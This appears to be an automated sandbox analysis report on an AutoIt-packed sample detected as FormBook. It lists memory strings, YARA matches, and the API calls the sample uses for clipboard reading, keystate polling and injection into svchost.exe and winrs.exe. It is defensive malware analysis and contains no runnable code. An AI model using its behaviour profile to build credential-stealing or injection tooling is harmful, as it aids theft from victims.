                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winrs.exe, 00000003.00000003.1957309498.0000000007B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EC6B0C
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EC6D07
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EC6B0C
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00EB2B37
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EDF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00EDF7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1774629160.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3520719360.0000000004150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: This is a third-party compiled AutoIt script.0_2_00E73D19
                Source: KSts9xW7qy.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: KSts9xW7qy.exe, 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fe094e75-8
                Source: KSts9xW7qy.exe, 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_447aa17e-9
                Source: KSts9xW7qy.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4f86d4f8-5
                Source: KSts9xW7qy.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_72f04099-4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C403 NtClose,1_2_0042C403
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B60 NtClose,LdrInitializeThunk,1_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,1_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674340 NtSetContextThread,1_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674650 NtSuspendThread,1_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BE0 NtQueryValueKey,1_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BF0 NtAllocateVirtualMemory,1_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BA0 NtEnumerateValueKey,1_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B80 NtQueryInformationFile,1_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AF0 NtWriteFile,1_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AD0 NtReadFile,1_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AB0 NtWaitForSingleObject,1_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F60 NtCreateProcessEx,1_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F30 NtCreateSection,1_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FE0 NtCreateFile,1_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FA0 NtQuerySection,1_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FB0 NtResumeThread,1_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F90 NtProtectVirtualMemory,1_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E30 NtWriteVirtualMemory,1_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EE0 NtQueueApcThread,1_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EA0 NtAdjustPrivilegesToken,1_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E80 NtReadVirtualMemory,1_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D30 NtUnmapViewOfSection,1_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D00 NtSetInformationFile,1_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D10 NtMapViewOfSection,1_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DD0 NtDelayExecution,1_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DB0 NtEnumerateKey,1_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C60 NtCreateKey,1_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C70 NtFreeVirtualMemory,1_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C00 NtQueryInformationProcess,1_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CF0 NtOpenProcess,1_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CC0 NtQueryVirtualMemory,1_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CA0 NtQueryInformationToken,1_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673010 NtOpenDirectoryObject,1_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673090 NtSetValueKey,1_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036739B0 NtGetContextThread,1_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D70 NtOpenThread,1_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D10 NtOpenProcessToken,1_2_03673D10
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D4340 NtSetContextThread,LdrInitializeThunk,3_2_033D4340
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D4650 NtSuspendThread,LdrInitializeThunk,3_2_033D4650
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2B60 NtClose,LdrInitializeThunk,3_2_033D2B60
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_033D2BA0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_033D2BF0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_033D2BE0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2AF0 NtWriteFile,LdrInitializeThunk,3_2_033D2AF0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2AD0 NtReadFile,LdrInitializeThunk,3_2_033D2AD0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2F30 NtCreateSection,LdrInitializeThunk,3_2_033D2F30
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2FB0 NtResumeThread,LdrInitializeThunk,3_2_033D2FB0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2FE0 NtCreateFile,LdrInitializeThunk,3_2_033D2FE0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_033D2E80
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_033D2EE0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_033D2D30
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_033D2D10
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_033D2DF0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2DD0 NtDelayExecution,LdrInitializeThunk,3_2_033D2DD0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_033D2C70
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2C60 NtCreateKey,LdrInitializeThunk,3_2_033D2C60
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_033D2CA0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D35C0 NtCreateMutant,LdrInitializeThunk,3_2_033D35C0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D39B0 NtGetContextThread,LdrInitializeThunk,3_2_033D39B0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2B80 NtQueryInformationFile,3_2_033D2B80
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2AB0 NtWaitForSingleObject,3_2_033D2AB0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2F60 NtCreateProcessEx,3_2_033D2F60
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2FA0 NtQuerySection,3_2_033D2FA0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2F90 NtProtectVirtualMemory,3_2_033D2F90
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2E30 NtWriteVirtualMemory,3_2_033D2E30
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2EA0 NtAdjustPrivilegesToken,3_2_033D2EA0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2D00 NtSetInformationFile,3_2_033D2D00
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2DB0 NtEnumerateKey,3_2_033D2DB0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2C00 NtQueryInformationProcess,3_2_033D2C00
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2CF0 NtOpenProcess,3_2_033D2CF0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D2CC0 NtQueryVirtualMemory,3_2_033D2CC0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D3010 NtOpenDirectoryObject,3_2_033D3010
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D3090 NtSetValueKey,3_2_033D3090
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D3D10 NtOpenProcessToken,3_2_033D3D10
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D3D70 NtOpenThread,3_2_033D3D70
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029D8EE0 NtCreateFile,3_2_029D8EE0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029D9340 NtAllocateVirtualMemory,3_2_029D9340
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029D9050 NtReadFile,3_2_029D9050
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029D91E0 NtClose,3_2_029D91E0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029D9140 NtDeleteFile,3_2_029D9140
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0326FBCD NtResumeThread,3_2_0326FBCD
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0326F969 NtMapViewOfSection,3_2_0326F969
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0326F94E NtMapViewOfSection,3_2_0326F94E
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB6685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00EB6685
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EAACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00EAACC5
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00EB79D3
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9B0430_2_00E9B043
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E832000_2_00E83200
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA410F0_2_00EA410F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E902A40_2_00E902A4
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E7E3B00_2_00E7E3B0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA038E0_2_00EA038E
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E906D90_2_00E906D9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA467F0_2_00EA467F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EDAACE0_2_00EDAACE
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA4BEF0_2_00EA4BEF
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9CCC10_2_00E9CCC1
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E7AF500_2_00E7AF50
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E76F070_2_00E76F07
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9D1B90_2_00E9D1B9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00ED31BC0_2_00ED31BC
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8B11F0_2_00E8B11F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA724D0_2_00EA724D
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E9123A0_2_00E9123A
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E793F00_2_00E793F0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB13CA0_2_00EB13CA
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8F5630_2_00E8F563
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E796C00_2_00E796C0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBB6CC0_2_00EBB6CC
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EDF7FF0_2_00EDF7FF
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E777B00_2_00E777B0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EA79C90_2_00EA79C9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8FA570_2_00E8FA57
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E79B600_2_00E79B60
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E83B700_2_00E83B70
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E77D190_2_00E77D19
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E99ED00_2_00E99ED0
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E8FE6F0_2_00E8FE6F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E77FA30_2_00E77FA3
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_017CFA000_2_017CFA00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183B31_2_004183B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012501_2_00401250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EA031_2_0042EA03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004042CC1_2_004042CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023F91_2_004023F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024001_2_00402400
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC2A1_2_0040FC2A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FC331_2_0040FC33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165B01_2_004165B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004165B31_2_004165B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE531_2_0040FE53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DE331_2_0040DE33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF791_2_0040DF79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DF831_2_0040DF83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FB01_2_00402FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA3521_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F01_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037003E61_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E02741_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C02C01_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C81581_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036301001_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA1181_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F81CC1_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F41A21_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037001AA1_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D20001_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036407701_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036647501_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C01_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C6E01_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036405351_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037005911_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F24461_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E44201_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EE4F61_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB401_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F6BD71_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA801_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036569621_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A01_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370A9A61_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364A8401_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036428401_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E8F01_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036268B81_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F401_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03682F281_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660F301_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E2F301_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC81_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BEFA01_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640E591_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEE261_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEEDB1_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652E901_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FCE931_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364AD001_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DCD1F1_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363ADE01_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03658DBF1_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640C001_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630CF21_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0CB51_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D2F01_2_0365D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C01_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A01_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367516C1_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F1721_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B16B1_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B01_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F70E91_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF0E01_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF0CC1_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C01_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF7B01_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036856301_2_03685630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F75711_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037095C31_2_037095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DD5B01_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036314601_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF43F1_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFB761_2_036FFB76
